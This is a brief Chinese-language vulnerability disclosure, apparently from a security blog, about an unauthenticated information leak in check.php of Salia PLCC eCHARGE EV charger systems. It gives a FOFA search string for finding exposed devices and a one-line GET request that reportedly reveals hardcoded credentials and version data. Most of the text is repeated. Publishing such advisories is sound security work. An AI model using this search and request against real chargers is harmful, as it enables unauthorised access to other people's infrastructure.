漏洞简介
Salia PLCC 的 eCHARGE 系列提供适用于家庭、企业和公共场所的智能电动汽车充电解决方案,具备高效充电、动态负载管理和光伏系统集成等功能的充电站。其充电管理系统 check.php 存在信息泄露漏洞,未授权攻击者可利用该漏洞获取系统敏感信息。
影响版本
2.2.0(最新版)
fofa语法
"Salia PLCC"
漏洞分析
漏洞复现
GET /check.php HTTP/1.1
Host: salia.mrxn.net
比如硬编码的账户和密码

版本号

0、鉴于很多bot/卑劣者窃取且不署名源出,因此所有新文章一律加采用UUID加密,不再公开。
1、本站文章均为原创,未经授权请勿用于任何商业用途。
2、仅供安全研究和学习使用。若因传播、利用本文档信息而产生任何直接或间接的后果或损害,均由使用者自行承担,文章作者不为此承担任何责任。
3、禁止任何人未经授权转载文章到大陆任何平台,特别是转载还没标记出处的卑劣者。
Salia PLCC 的 eCHARGE 系列提供适用于家庭、企业和公共场所的智能电动汽车充电解决方案,具备高效充电、动态负载管理和光伏系统集成等功能的充电站。其充电管理系统 check.php 存在信息泄露漏洞,未授权攻击者可利用该漏洞获取系统敏感信息。
2.2.0(最新版)
"Salia PLCC"
GET /check.php HTTP/1.1
Host: salia.mrxn.net
比如硬编码的账户和密码

版本号
